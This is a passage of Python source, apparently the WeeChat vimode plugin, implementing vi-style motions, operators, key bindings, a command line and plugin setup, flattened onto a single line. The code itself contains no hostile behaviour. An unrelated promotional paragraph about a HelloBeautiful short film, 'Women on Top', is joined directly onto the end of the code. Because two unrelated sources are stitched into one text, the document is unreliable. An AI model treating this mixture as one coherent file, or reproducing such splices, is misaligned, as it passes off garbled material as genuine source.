motion is inclusive). See Also: `operator_base()`. """ start = min(pos1, pos2) end = max(pos1, pos2) if overwrite: end += 1 input_line = list(input_line) del input_line[start:end] input_line = "".join(input_line) weechat.buffer_set(buf, "input", input_line) set_cur(buf, input_line, pos1) def operator_c(buf, input_line, pos1, pos2, overwrite=False): """Delete text from `pos1` to `pos2` from the input and enter Insert mode. If `overwrite` is set to True, the character at the cursor's new position is removed as well (the motion is inclusive.) See Also: `operator_base()`. """ operator_d(buf, input_line, pos1, pos2, overwrite) set_mode("INSERT") def operator_y(buf, input_line, pos1, pos2, _): """Yank text from `pos1` to `pos2` from the input line. See Also: `operator_base()`. """ start = min(pos1, pos2) end = max(pos1, pos2) proc = subprocess.Popen(["xclip", "-selection", "c"], stdin=subprocess.PIPE) proc.communicate(input=input_line[start:end]) # Motions: # -------- def motion_0(input_line, cur, count): """Go to the first character of the line. See Also; `motion_base()`. """ return 0, False, False def motion_w(input_line, cur, count): """Go `count` words forward and return position. See Also: `motion_base()`. """ pos = get_pos(input_line, REGEX_MOTION_LOWERCASE_W, cur, True, count) if pos == -1: return len(input_line), False, False return cur + pos, False, False def motion_W(input_line, cur, count): """Go `count` WORDS forward and return position. See Also: `motion_base()`. """ pos = get_pos(input_line, REGEX_MOTION_UPPERCASE_W, cur, True, count) if pos == -1: return len(input_line), False, False return cur + pos, False, False def motion_e(input_line, cur, count): """Go to the end of `count` words and return position. See Also: `motion_base()`. """ for _ in range(max(1, count)): found = False pos = cur for pos in range(cur + 1, len(input_line) - 1): # Whitespace, keep going. if WHITESPACE.match(input_line[pos]): pass # End of sequence made from 'iskeyword' characters only, # or end of sequence made from non 'iskeyword' characters only. elif ((IS_KEYWORD.match(input_line[pos]) and (not IS_KEYWORD.match(input_line[pos + 1]) or WHITESPACE.match(input_line[pos + 1]))) or (not IS_KEYWORD.match(input_line[pos]) and (IS_KEYWORD.match(input_line[pos + 1]) or WHITESPACE.match(input_line[pos + 1])))): found = True cur = pos break # We're at the character before the last and we still found nothing. # Go to the last character. if not found: cur = pos + 1 return cur, True, False def motion_E(input_line, cur, count): """Go to the end of `count` WORDS and return cusor position. See Also: `motion_base()`. """ pos = get_pos(input_line, REGEX_MOTION_UPPERCASE_E, cur, True, count) if pos == -1: return len(input_line), False, False return cur + pos, True, False def motion_b(input_line, cur, count): """Go `count` words backwards and return position. See Also: `motion_base()`. """ # "b" is just "e" on inverted data (e.g. "olleH" instead of "Hello"). pos_inv = motion_e(input_line[::-1], len(input_line) - cur - 1, count)[0] pos = len(input_line) - pos_inv - 1 return pos, True, False def motion_B(input_line, cur, count): """Go `count` WORDS backwards and return position. See Also: `motion_base()`. """ new_cur = len(input_line) - cur pos = get_pos(input_line[::-1], REGEX_MOTION_UPPERCASE_B, new_cur, count=count) if pos == -1: return 0, False, False pos = len(input_line) - (pos + new_cur + 1) return pos, True, False def motion_ge(input_line, cur, count): """Go to end of `count` words backwards and return position. See Also: `motion_base()`. """ # "ge is just "w" on inverted data (e.g. "olleH" instead of "Hello"). pos_inv = motion_w(input_line[::-1], len(input_line) - cur - 1, count)[0] pos = len(input_line) - pos_inv - 1 return pos, True, False def motion_gE(input_line, cur, count): """Go to end of `count` WORDS backwards and return position. See Also: `motion_base()`. """ new_cur = len(input_line) - cur - 1 pos = get_pos(input_line[::-1], REGEX_MOTION_G_UPPERCASE_E, new_cur, True, count) if pos == -1: return 0, False, False pos = len(input_line) - (pos + new_cur + 1) return pos, True, False def motion_h(input_line, cur, count): """Go `count` characters to the left and return position. See Also: `motion_base()`. """ return max(0, cur - max(count, 1)), False, False def motion_l(input_line, cur, count): """Go `count` characters to the right and return position. See Also: `motion_base()`. """ return cur + max(count, 1), False, False def motion_carret(input_line, cur, count): """Go to first non-blank character of line and return position. See Also: `motion_base()`. """ pos = get_pos(input_line, REGEX_MOTION_CARRET, 0) return pos, False, False def motion_dollar(input_line, cur, count): """Go to end of line and return position. See Also: `motion_base()`. """ pos = len(input_line) return pos, False, False def motion_f(input_line, cur, count): """Go to `count`'th occurence of character and return position. See Also: `motion_base()`. """ return start_catching_keys(1, "cb_motion_f", input_line, cur, count) def cb_motion_f(update_last=True): """Callback for `motion_f()`. Args: update_last (bool, optional): should `last_search_motion` be updated? Set to False when calling from `key_semicolon()` or `key_comma()` so that the last search motion isn't overwritten. Defaults to True. See Also: `start_catching_keys()`. """ global last_search_motion pattern = catching_keys_data['keys'] pos = get_pos(catching_keys_data['input_line'], re.escape(pattern), catching_keys_data['cur'], True, catching_keys_data['count']) catching_keys_data['new_cur'] = max(0, pos) + catching_keys_data['cur'] if update_last: last_search_motion = {'motion': "f", 'data': pattern} cb_key_combo_default(None, None, "") def motion_F(input_line, cur, count): """Go to `count`'th occurence of char to the right and return position. See Also: `motion_base()`. """ return start_catching_keys(1, "cb_motion_F", input_line, cur, count) def cb_motion_F(update_last=True): """Callback for `motion_F()`. Args: update_last (bool, optional): should `last_search_motion` be updated? Set to False when calling from `key_semicolon()` or `key_comma()` so that the last search motion isn't overwritten. Defaults to True. See Also: `start_catching_keys()`. """ global last_search_motion pattern = catching_keys_data['keys'] cur = len(catching_keys_data['input_line']) - catching_keys_data['cur'] pos = get_pos(catching_keys_data['input_line'][::-1], re.escape(pattern), cur, False, catching_keys_data['count']) catching_keys_data['new_cur'] = catching_keys_data['cur'] - max(0, pos + 1) if update_last: last_search_motion = {'motion': "F", 'data': pattern} cb_key_combo_default(None, None, "") def motion_t(input_line, cur, count): """Go to `count`'th occurence of char and return position. The position returned is the position of the character to the left of char. See Also: `motion_base()`. """ return start_catching_keys(1, "cb_motion_t", input_line, cur, count) def cb_motion_t(update_last=True): """Callback for `motion_t()`. Args: update_last (bool, optional): should `last_search_motion` be updated? Set to False when calling from `key_semicolon()` or `key_comma()` so that the last search motion isn't overwritten. Defaults to True. See Also: `start_catching_keys()`. """ global last_search_motion pattern = catching_keys_data['keys'] pos = get_pos(catching_keys_data['input_line'], re.escape(pattern), catching_keys_data['cur'] + 1, True, catching_keys_data['count']) pos += 1 if pos > 0: catching_keys_data['new_cur'] = pos + catching_keys_data['cur'] - 1 else: catching_keys_data['new_cur'] = catching_keys_data['cur'] if update_last: last_search_motion = {'motion': "t", 'data': pattern} cb_key_combo_default(None, None, "") def motion_T(input_line, cur, count): """Go to `count`'th occurence of char to the left and return position. The position returned is the position of the character to the right of char. See Also: `motion_base()`. """ return start_catching_keys(1, "cb_motion_T", input_line, cur, count) def cb_motion_T(update_last=True): """Callback for `motion_T()`. Args: update_last (bool, optional): should `last_search_motion` be updated? Set to False when calling from `key_semicolon()` or `key_comma()` so that the last search motion isn't overwritten. Defaults to True. See Also: `start_catching_keys()`. """ global last_search_motion pattern = catching_keys_data['keys'] pos = get_pos(catching_keys_data['input_line'][::-1], re.escape(pattern), (len(catching_keys_data['input_line']) - (catching_keys_data['cur'] + 1)) + 1, True, catching_keys_data['count']) pos += 1 if pos > 0: catching_keys_data['new_cur'] = catching_keys_data['cur'] - pos + 1 else: catching_keys_data['new_cur'] = catching_keys_data['cur'] if update_last: last_search_motion = {'motion': "T", 'data': pattern} cb_key_combo_default(None, None, "") # Keys: # ----- def key_cc(buf, input_line, cur, count): """Delete line and start Insert mode. See Also: `key_base()`. """ weechat.command("", "/input delete_line") set_mode("INSERT") def key_C(buf, input_line, cur, count): """Delete from cursor to end of line and start Insert mode. See Also: `key_base()`. """ weechat.command("", "/input delete_end_of_line") set_mode("INSERT") def key_yy(buf, input_line, cur, count): """Yank line. See Also: `key_base()`. """ proc = subprocess.Popen(["xclip", "-selection", "c"], stdin=subprocess.PIPE) proc.communicate(input=input_line) def key_i(buf, input_line, cur, count): """Start Insert mode. See Also: `key_base()`. """ set_mode("INSERT") def key_a(buf, input_line, cur, count): """Move cursor one character to the right and start Insert mode. See Also: `key_base()`. """ set_cur(buf, input_line, cur + 1, False) set_mode("INSERT") def key_A(buf, input_line, cur, count): """Move cursor to end of line and start Insert mode. See Also: `key_base()`. """ set_cur(buf, input_line, len(input_line), False) set_mode("INSERT") def key_I(buf, input_line, cur, count): """Move cursor to first non-blank character and start Insert mode. See Also: `key_base()`. """ pos, _, _ = motion_carret(input_line, cur, 0) set_cur(buf, input_line, pos) set_mode("INSERT") def key_G(buf, input_line, cur, count): """Scroll to specified line or bottom of buffer. See Also: `key_base()`. """ if count > 0: # This is necessary to prevent weird scroll jumps. weechat.command("", "/window scroll_top") weechat.command("", "/window scroll %s" % (count - 1)) else: weechat.command("", "/window scroll_bottom") def key_r(buf, input_line, cur, count): """Replace `count` characters under the cursor. See Also: `key_base()`. """ start_catching_keys(1, "cb_key_r", input_line, cur, count, buf) def cb_key_r(): """Callback for `key_r()`. See Also: `start_catching_keys()`. """ global catching_keys_data input_line = list(catching_keys_data['input_line']) count = max(catching_keys_data['count'], 1) cur = catching_keys_data['cur'] if cur + count <= len(input_line): for _ in range(count): input_line[cur] = catching_keys_data['keys'] cur += 1 input_line = "".join(input_line) weechat.buffer_set(catching_keys_data['buf'], "input", input_line) set_cur(catching_keys_data['buf'], input_line, cur - 1) catching_keys_data = {'amount': 0} def key_R(buf, input_line, cur, count): """Start Replace mode. See Also: `key_base()`. """ set_mode("REPLACE") def key_tilda(buf, input_line, cur, count): """Switch the case of `count` characters under the cursor. See Also: `key_base()`. """ input_line = list(input_line) count = max(1, count) while count and cur < len(input_line): input_line[cur] = input_line[cur].swapcase() count -= 1 cur += 1 input_line = "".join(input_line) weechat.buffer_set(buf, "input", input_line) set_cur(buf, input_line, cur) def key_alt_j(buf, input_line, cur, count): """Go to WeeChat buffer. Called to preserve WeeChat's alt-j buffer switching. This is only called when alt-j<num> is pressed after pressing Esc, because \x01\x01j is received in key_combo_default which becomes \x01j after removing the detected Esc key. If Esc isn't the last pressed key, \x01j<num> is directly received in key_combo_default. """ start_catching_keys(2, "cb_key_alt_j", input_line, cur, count) def cb_key_alt_j(): """Callback for `key_alt_j()`. See Also: `start_catching_keys()`. """ global catching_keys_data weechat.command("", "/buffer " + catching_keys_data['keys']) catching_keys_data = {'amount': 0} def key_semicolon(buf, input_line, cur, count, swap=False): """Repeat last f, t, F, T `count` times. Args: swap (bool, optional): if True, the last motion will be repeated in the opposite direction (e.g. "f" instead of "F"). Defaults to False. See Also: `key_base()`. """ global catching_keys_data, vi_buffer catching_keys_data = ({'amount': 0, 'input_line': input_line, 'cur': cur, 'keys': last_search_motion['data'], 'count': count, 'new_cur': 0, 'buf': buf}) # Swap the motion's case if called from key_comma. if swap: motion = last_search_motion['motion'].swapcase() else: motion = last_search_motion['motion'] func = "cb_motion_%s" % motion vi_buffer = motion globals()[func](False) def key_comma(buf, input_line, cur, count): """Repeat last f, t, F, T in opposite direction `count` times. See Also: `key_base()`. """ key_semicolon(buf, input_line, cur, count, True) # Vi key bindings. # ================ # String values will be executed as normal WeeChat commands. # For functions, see `key_base()` for reference. VI_KEYS = {'j': "/window scroll_down", 'k': "/window scroll_up", 'G': key_G, 'gg': "/window scroll_top", 'x': "/input delete_next_char", 'X': "/input delete_previous_char", 'dd': "/input delete_line", 'D': "/input delete_end_of_line", 'cc': key_cc, 'C': key_C, 'i': key_i, 'a': key_a, 'A': key_A, 'I': key_I, 'yy': key_yy, 'p': "/input clipboard_paste", '/': "/input search_text", 'gt': "/buffer +1", 'K': "/buffer +1", 'gT': "/buffer -1", 'J': "/buffer -1", 'r': key_r, 'R': key_R, '~': key_tilda, '\x01[[A': "/input history_previous", '\x01[[B': "/input history_next", '\x01[[C': "/input move_next_char", '\x01[[D': "/input move_previous_char", '\x01[[H': "/input move_beginning_of_line", '\x01[[F': "/input move_end_of_line", '\x01[[5~': "/window page_up", '\x01[[6~': "/window page_down", '\x01[[3~': "/input delete_next_char", '\x01[[2~': key_i, '\x01M': "/input return", '\x01?': "/input move_previous_char", ' ': "/input move_next_char", '\x01[j': key_alt_j, '\x01[1': "/buffer *1", '\x01[2': "/buffer *2", '\x01[3': "/buffer *3", '\x01[4': "/buffer *4", '\x01[5': "/buffer *5", '\x01[6': "/buffer *6", '\x01[7': "/buffer *7", '\x01[8': "/buffer *8", '\x01[9': "/buffer *9", '\x01[0': "/buffer *10", '\x01^': "/input jump_last_buffer_displayed", '\x01D': "/window page_down", '\x01U': "/window page_up", '\x01Wh': "/window left", '\x01Wj': "/window down", '\x01Wk': "/window up", '\x01Wl': "/window right", '\x01W=': "/window balance", '\x01Wx': "/window swap", '\x01Ws': "/window splith", '\x01Wv': "/window splitv", '\x01Wq': "/window merge", ';': key_semicolon, ',': key_comma} # Add alt-j<number> bindings. for i in range(10, 99): VI_KEYS['\x01[j%s' % i] = "/buffer %s" % i # Key handling. # ============= def cb_key_pressed(data, signal, signal_data): """Detect potential Esc presses. Alt and Esc are detected as the same key in most terminals. The difference is that Alt signal is sent just before the other pressed key's signal. We therefore use a timeout (50ms) to detect whether Alt or Esc was pressed. """ global last_signal_time last_signal_time = time.time() if signal_data == "\x01[": # In 50ms, check if any other keys were pressed. If not, it's Esc! weechat.hook_timer(50, 0, 1, "cb_check_esc", "{:f}".format(last_signal_time)) return weechat.WEECHAT_RC_OK def cb_check_esc(data, remaining_calls): """Check if the Esc key was pressed and change the mode accordingly.""" global esc_pressed, vi_buffer, cmd_text, catching_keys_data if last_signal_time == float(data): esc_pressed += 1 set_mode("NORMAL") # Cancel any current partial commands. vi_buffer = "" cmd_text = "" weechat.command("", "/bar hide vi_cmd") catching_keys_data = {'amount': 0} weechat.bar_item_update("vi_buffer") return weechat.WEECHAT_RC_OK def cb_key_combo_default(data, signal, signal_data): """Eat and handle key events when in Normal mode, if needed. The key_combo_default signal is sent when a key combo is pressed. For example, alt-k will send the "\x01[k" signal. Esc is handled a bit differently to avoid delays, see `cb_key_pressed()`. """ global esc_pressed, vi_buffer, cmd_text # If Esc was pressed, strip the Esc part from the pressed keys. # Example: user presses Esc followed by i. This is detected as "\x01[i", # but we only want to handle "i". keys = signal_data if esc_pressed or esc_pressed == -2: if keys.startswith("\x01[" * esc_pressed): # Multiples of 3 seem to "cancel" themselves, # e.g. Esc-Esc-Esc-Alt-j-11 is detected as "\x01[\x01[\x01" # followed by "\x01[j11" (two different signals). if signal_data == "\x01[" * 3: esc_pressed = -1 # `cb_check_esc()` will increment it to 0. else: esc_pressed = 0 # This can happen if a valid combination is started but interrupted # with Esc, such as Ctrl-W→Esc→w which would send two signals: # "\x01W\x01[" then "\x01W\x01[w". # In that case, we still need to handle the next signal ("\x01W\x01[w") # so we use the special value "-2". else: esc_pressed = -2 keys = keys.split("\x01[")[-1] # Remove the "Esc" part(s). # Ctrl-Space. elif keys == "\x01@": set_mode("NORMAL") return weechat.WEECHAT_RC_OK_EAT # Nothing to do here. if mode == "INSERT": return weechat.WEECHAT_RC_OK # We're in Replace mode — allow "normal" key presses (e.g. "a") and # overwrite the next character with them, but let the other key presses # pass normally (e.g. backspace, arrow keys, etc). if mode == "REPLACE": if len(keys) == 1: weechat.command("", "/input delete_next_char") elif keys == "\x01?": weechat.command("", "/input move_previous_char") return weechat.WEECHAT_RC_OK_EAT return weechat.WEECHAT_RC_OK # We're catching keys! Only "normal" key presses interest us (e.g. "a"), # not complex ones (e.g. backspace). if len(keys) == 1 and catching_keys_data['amount']: catching_keys_data['keys'] += keys catching_keys_data['amount'] -= 1 # Done catching keys, execute the callback. if catching_keys_data['amount'] == 0: globals()[catching_keys_data['callback']]() vi_buffer = "" weechat.bar_item_update("vi_buffer") return weechat.WEECHAT_RC_OK_EAT # We're in command-line mode. if cmd_text: # Backspace key. if keys == "\x01?": # Remove the last character from our command line. cmd_text = list(cmd_text) del cmd_text[-1] cmd_text = "".join(cmd_text) # Return key. elif keys == "\x01M": weechat.hook_timer(1, 0, 1, "cb_exec_cmd", cmd_text) cmd_text = "" # Input. elif len(keys) == 1: cmd_text += keys # Update (and maybe hide) the bar item. weechat.bar_item_update("cmd_text") if not cmd_text: weechat.command("", "/bar hide vi_cmd") return weechat.WEECHAT_RC_OK_EAT # Enter command mode. elif keys == ":": cmd_text += ":" weechat.command("", "/bar show vi_cmd") weechat.bar_item_update("cmd_text") return weechat.WEECHAT_RC_OK_EAT # Add key to the buffer. vi_buffer += keys weechat.bar_item_update("vi_buffer") if not vi_buffer: return weechat.WEECHAT_RC_OK # Check if the keys have a (partial or full) match. If so, also get the # keys without the count. (These are the actual keys we should handle.) # After that, `vi_buffer` is only used for display purposes — only # `vi_keys` is checked for all the handling. # If no matches are found, the keys buffer is cleared. matched, vi_keys, count = get_keys_and_count(vi_buffer) if not matched: vi_buffer = "" return weechat.WEECHAT_RC_OK_EAT buf = weechat.current_buffer() input_line = weechat.buffer_get_string(buf, "input") cur = weechat.buffer_get_integer(buf, "input_pos") # It's a key. If the corresponding value is a string, we assume it's a # WeeChat command. Otherwise, it's a method we'll call. if vi_keys in VI_KEYS: if isinstance(VI_KEYS[vi_keys], str): for _ in range(max(count, 1)): # This is to avoid crashing WeeChat on script reloads/unloads, # because no hooks must still be running when a script is # reloaded or unloaded. if VI_KEYS[vi_keys] == "/input return": return weechat.WEECHAT_RC_OK weechat.command("", VI_KEYS[vi_keys]) current_cur = weechat.buffer_get_integer(buf, "input_pos") set_cur(buf, input_line, current_cur) else: VI_KEYS[vi_keys](buf, input_line, cur, count) # It's a motion (e.g. "w") — call `motion_X()` where X is the motion, then # set the cursor's position to what that function returned. elif vi_keys in VI_MOTIONS: if vi_keys in SPECIAL_CHARS: func = "motion_%s" % SPECIAL_CHARS[vi_keys] else: func = "motion_%s" % vi_keys end, _, _ = globals()[func](input_line, cur, count) set_cur(buf, input_line, end) # It's an operator + motion (e.g. "dw") — call `motion_X()` (where X is # the motion), then we call `operator_Y()` (where Y is the operator) # with the position `motion_X()` returned. `operator_Y()` should then # handle changing the input line. elif (len(vi_keys) > 1 and vi_keys[0] in VI_OPERATORS and vi_keys[1:] in VI_MOTIONS): if vi_keys[1:] in SPECIAL_CHARS: func = "motion_%s" % SPECIAL_CHARS[vi_keys[1:]] else: func = "motion_%s" % vi_keys[1:] pos, overwrite, catching = globals()[func](input_line, cur, count) # If it's a catching motion, we don't want to call the operator just # yet -- this code will run again when the motion is complete, at which # point we will. if not catching: oper = "operator_%s" % vi_keys[0] globals()[oper](buf, input_line, cur, pos, overwrite) # The combo isn't completed yet (e.g. just "d"). else: return weechat.WEECHAT_RC_OK_EAT # We've already handled the key combo, so clear the keys buffer. if not catching_keys_data['amount']: vi_buffer = "" weechat.bar_item_update("vi_buffer") return weechat.WEECHAT_RC_OK_EAT # Callbacks. # ========== # Bar items. # ---------- def cb_vi_buffer(data, item, window): """Return the content of the vi buffer (pressed keys on hold).""" return vi_buffer def cb_cmd_text(data, item, window): """Return the text of the command line.""" return cmd_text def cb_mode_indicator(data, item, window): """Return the current mode (INSERT/NORMAL/REPLACE).""" return mode def cb_line_numbers(data, item, window): """Fill the line numbers bar item.""" bar_height = weechat.window_get_integer(window, "win_chat_height") content = "" for i in range(1, bar_height + 1): content += "%s \n" % i return content # Callbacks for the line numbers bar. # ................................... def cb_update_line_numbers(data, signal, signal_data): """Call `cb_timer_update_line_numbers()` when switching buffers. A timer is required because the bar item is refreshed before the new buffer is actually displayed, so ``win_chat_height`` would refer to the old buffer. Using a timer refreshes the item after the new buffer is displayed. """ weechat.hook_timer(10, 0, 1, "cb_timer_update_line_numbers", "") return weechat.WEECHAT_RC_OK def cb_timer_update_line_numbers(data, remaining_calls): """Update the line numbers bar item.""" weechat.bar_item_update("line_numbers") return weechat.WEECHAT_RC_OK # Config. # ------- def cb_config(data, option, value): """Script option changed, update our copy.""" option_name = option.split(".")[-1] if option_name in vimode_settings: vimode_settings[option_name] = value return weechat.WEECHAT_RC_OK # Command-line execution. # ----------------------- def cb_exec_cmd(data, remaining_calls): """Translate and execute our custom commands to WeeChat command.""" # Process the entered command. data = list(data) del data[0] data = "".join(data) # s/foo/bar command. if data.startswith("s/"): cmd = data parsed_cmd = next(csv.reader(StringIO(cmd), delimiter="/", escapechar="\\")) pattern = re.escape(parsed_cmd[1]) repl = parsed_cmd[2] repl = re.sub(r"([^\\])&", r"\1" + pattern, repl) flag = None if len(parsed_cmd) == 4: flag = parsed_cmd[3] count = 1 if flag == "g": count = 0 buf = weechat.current_buffer() input_line = weechat.buffer_get_string(buf, "input") input_line = re.sub(pattern, repl, input_line, count) weechat.buffer_set(buf, "input", input_line) # Shell command. elif data.startswith("!"): weechat.command("", "/exec -buffer shell %s" % data[1:]) # Commands like `:22`. This should start cursor mode (``/cursor``) and take # us to the relevant line. # TODO: look into possible replacement key bindings for: ← ↑ → ↓ Q m q. elif data.isdigit(): line_number = int(data) hdata_window = weechat.hdata_get("window") window = weechat.current_window() x = weechat.hdata_integer(hdata_window, window, "win_chat_x") y = (weechat.hdata_integer(hdata_window, window, "win_chat_y") + (line_number - 1)) weechat.command("", "/cursor go {},{}".format(x, y)) # Check againt defined commands. else: data = data.split(" ", 1) cmd = data[0] args = "" if len(data) == 2: args = data[1] if cmd in VI_COMMANDS: weechat.command("", "%s %s" % (VI_COMMANDS[cmd], args)) # No vi commands defined, run the command as a WeeChat command. else: weechat.command("", "/{} {}".format(cmd, args)) return weechat.WEECHAT_RC_OK # Script commands. # ---------------- def cb_vimode_cmd(data, buf, args): """Handle script commands (``/vimode <command>``).""" # ``/vimode`` or ``/vimode help`` if not args or args == "help": weechat.prnt("", "[vimode.py] %s" % README_URL) # ``/vimode bind_keys`` or ``/vimode bind_keys --list`` elif args.startswith("bind_keys"): infolist = weechat.infolist_get("key", "", "default") weechat.infolist_reset_item_cursor(infolist) commands = ["/key unbind ctrl-W", "/key bind ctrl-W /input delete_previous_word", "/key bind ctrl-^ /input jump_last_buffer_displayed", "/key bind ctrl-Wh /window left", "/key bind ctrl-Wj /window down", "/key bind ctrl-Wk /window up", "/key bind ctrl-Wl /window right", "/key bind ctrl-W= /window balance", "/key bind ctrl-Wx /window swap", "/key bind ctrl-Ws /window splith", "/key bind ctrl-Wv /window splitv", "/key bind ctrl-Wq /window merge"] while weechat.infolist_next(infolist): key = weechat.infolist_string(infolist, "key") if re.match(REGEX_PROBLEMATIC_KEYBINDINGS, key): commands.append("/key unbind %s" % key) if args == "bind_keys": weechat.prnt("", "Running commands:") for command in commands: weechat.command("", command) weechat.prnt("", "Done.") elif args == "bind_keys --list": weechat.prnt("", "Listing commands we'll run:") for command in commands: weechat.prnt("", " %s" % command) weechat.prnt("", "Done.") return weechat.WEECHAT_RC_OK # Helpers. # ======== # Motions/keys helpers. # --------------------- def get_pos(data, regex, cur, ignore_cur=False, count=0): """Return the position of `regex` match in `data`, starting at `cur`. Args: data (str): the data to search in. regex (pattern): regex pattern to search for. cur (int): where to start the search. ignore_cur (bool, optional): should the first match be ignored if it's also the character at `cur`? Defaults to False. count (int, optional): the index of the match to return. Defaults to 0. Returns: int: position of the match. -1 if no matches are found. """ # List of the *positions* of the found patterns. matches = [m.start() for m in re.finditer(regex, data[cur:])] pos = -1 if count: if len(matches) > count - 1: if ignore_cur and matches[0] == 0: if len(matches) > count: pos = matches[count] else: pos = matches[count - 1] elif matches: if ignore_cur and matches[0] == 0: if len(matches) > 1: pos = matches[1] else: pos = matches[0] return pos def set_cur(buf, input_line, pos, cap=True): """Set the cursor's position. Args: buf (str): pointer to the current WeeChat buffer. input_line (str): the content of the input line. pos (int): the position to set the cursor to. cap (bool, optional): if True, the `pos` will shortened to the length of `input_line` if it's too long. Defaults to True. """ if cap: pos = min(pos, len(input_line) - 1) weechat.buffer_set(buf, "input_pos", str(pos)) def start_catching_keys(amount, callback, input_line, cur, count, buf=None): """Start catching keys. Used for special commands (e.g. "f", "r"). amount (int): amount of keys to catch. callback (str): name of method to call once all keys are caught. input_line (str): input line's content. cur (int): cursor's position. count (int): count, e.g. "2" for "2fs". buf (str, optional): pointer to the current WeeChat buffer. Defaults to None. `catching_keys_data` is a dict with the above arguments, as well as: keys (str): pressed keys will be added under this key. new_cur (int): the new cursor's position, set in the callback. When catching keys is active, normal pressed keys (e.g. "a" but not arrows) will get added to `catching_keys_data` under the key "keys", and will not be handled any further. Once all keys are caught, the method defined in the "callback" key is called, and can use the data in `catching_keys_data` to perform its action. """ global catching_keys_data if "new_cur" in catching_keys_data: new_cur = catching_keys_data['new_cur'] catching_keys_data = {'amount': 0} return new_cur, True, False catching_keys_data = ({'amount': amount, 'callback': callback, 'input_line': input_line, 'cur': cur, 'keys': "", 'count': count, 'new_cur': 0, 'buf': buf}) return cur, False, True def get_keys_and_count(combo): """Check if `combo` is a valid combo and extract keys/counts if so. Args: combo (str): pressed keys combo. Returns: matched (bool): True if the combo has a (partial or full) match, False otherwise. combo (str): `combo` with the count removed. These are the actual keys we should handle. count (int): count for `combo`. """ # Look for a potential match (e.g. "d" might become "dw" or "dd" so we # accept it, but "d9" is invalid). matched = False # Digits are allowed at the beginning (counts or "0"). count = 0 if combo.isdigit(): matched = True elif combo and combo[0].isdigit(): count = "" for char in combo: if char.isdigit(): count += char else: break combo = combo.replace(count, "", 1) count = int(count) # Check against defined keys. if not matched: for key in VI_KEYS: if key.startswith(combo): matched = True break # Check against defined motions. if not matched: for motion in VI_MOTIONS: if motion.startswith(combo): matched = True break # Check against defined operators + motions. if not matched: for operator in VI_OPERATORS: if combo.startswith(operator): # Check for counts before the motion (but after the operator). vi_keys_no_op = combo[len(operator):] # There's no motion yet. if vi_keys_no_op.isdigit(): matched = True break # Get the motion count, then multiply the operator count by # it, similar to vim's behavior. elif vi_keys_no_op and vi_keys_no_op[0].isdigit(): motion_count = "" for char in vi_keys_no_op: if char.isdigit(): motion_count += char else: break # Remove counts from `vi_keys_no_op`. combo = combo.replace(motion_count, "", 1) motion_count = int(motion_count) count = max(count, 1) * motion_count # Check against defined motions. for motion in VI_MOTIONS: if motion.startswith(combo[1:]): matched = True break return matched, combo, count # Other helpers. # -------------- def set_mode(arg): """Set the current mode and update the bar mode indicator.""" global mode mode = arg # If we're going to Normal mode, the cursor must move one character to the # left. if mode == "NORMAL": buf = weechat.current_buffer() input_line = weechat.buffer_get_string(buf, "input") cur = weechat.buffer_get_integer(buf, "input_pos") set_cur(buf, input_line, cur - 1, False) weechat.bar_item_update("mode_indicator") def print_warning(text): """Print warning, in red, to the current buffer.""" weechat.prnt("", ("%s[vimode.py] %s" % (weechat.color("red"), text))) def check_warnings(): """Warn the user about problematic key bindings and tmux/screen.""" user_warned = False # Warn the user about problematic key bindings that may conflict with # vimode. # The solution is to remove these key bindings, but that's up to the user. infolist = weechat.infolist_get("key", "", "default") problematic_keybindings = [] while weechat.infolist_next(infolist): key = weechat.infolist_string(infolist, "key") command = weechat.infolist_string(infolist, "command") if re.match(REGEX_PROBLEMATIC_KEYBINDINGS, key): problematic_keybindings.append("%s -> %s" % (key, command)) if problematic_keybindings: user_warned = True print_warning("Problematic keybindings detected:") for keybinding in problematic_keybindings: print_warning(" %s" % keybinding) print_warning("These keybindings may conflict with vimode.") print_warning("You can remove problematic key bindings and add" " recommended ones by using /vimode bind_keys, or only" " list them with /vimode bind_keys --list") print_warning("For help, see: %s" % FAQ_KEYBINDINGS) del problematic_keybindings # Warn tmux/screen users about possible Esc detection delays. if "STY" in os.environ or "TMUX" in os.environ: if user_warned: weechat.prnt("", "") user_warned = True print_warning("tmux/screen users, see: %s" % FAQ_ESC) if (user_warned and not weechat.config_string_to_boolean(vimode_settings['no_warn'])): if user_warned: weechat.prnt("", "") print_warning("To force disable warnings, you can set" " plugins.var.python.vimode.no_warn to 'on'") # Main script. # ============ if __name__ == "__main__": weechat.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION, SCRIPT_LICENSE, SCRIPT_DESC, "", "") # Warn the user if he's using an unsupported WeeChat version. VERSION = weechat.info_get("version_number", "") if int(VERSION) < 0x01000000: print_warning("Please upgrade to WeeChat ≥ 1.0.0. Previous versions" " are not supported.") # Set up script options. for option, value in vimode_settings.items(): if weechat.config_is_set_plugin(option): vimode_settings[option] = weechat.config_get_plugin(option) else: weechat.config_set_plugin(option, value[0]) vimode_settings[option] = value[0] weechat.config_set_desc_plugin(option, "%s (default: \"%s\")" % (value[1], value[0])) # Warn the user about possible problems if necessary. if not weechat.config_string_to_boolean(vimode_settings['no_warn']): check_warnings() # Create bar items and setup hooks. weechat.bar_item_new("mode_indicator", "cb_mode_indicator", "") weechat.bar_item_new("cmd_text", "cb_cmd_text", "") weechat.bar_item_new("vi_buffer", "cb_vi_buffer", "") weechat.bar_item_new("line_numbers", "cb_line_numbers", "") weechat.bar_new("vi_cmd", "off", "0", "root", "", "bottom", "vertical", "vertical", "0", "0", "default", "default", "default", "0", "cmd_text") weechat.bar_new("vi_line_numbers", "on", "0", "window", "", "left", "vertical", "vertical", "0", "0", "default", "default", "default", "0", "line_numbers") weechat.hook_config("plugins.var.python.%s.*" % SCRIPT_NAME, "cb_config", "") weechat.hook_signal("key_pressed", "cb_key_pressed", "") weechat.hook_signal("key_combo_default", "cb_key_combo_default", "") weechat.hook_signal("buffer_switch", "cb_update_line_numbers", "") weechat.hook_command("vimode", SCRIPT_DESC, "[help | bind_keys [--list]]", " help: show help\n" "bind_keys: unbind problematic keys, and bind" " recommended keys to use in WeeChat\n" " --list: only list changes", "help || bind_keys |--list", "cb_vimode_cmd", "")
As a part of our Women’s History Month celebration, HelloBeautiful is proud to present our first HB Studios short film “Women on Top”. This 14-minute straight talk documentary features Soledad O’Brien, Lisa Leslie, Eve, Anika Noni Rose, Jurnee Smollett, Jody Watley, Chrisette Michele, Tia Mowry and Beverly Johnson in an unfiltered discussion about womanhood, power, femininity, sexuality and sisterhood. Watch and enjoy! Join us on Twitter Thursdays during March at 1 p.m. for #WOT conversations with @hellobeautiful and ladies featured in the film. 1. The Launch of "Women on Top"
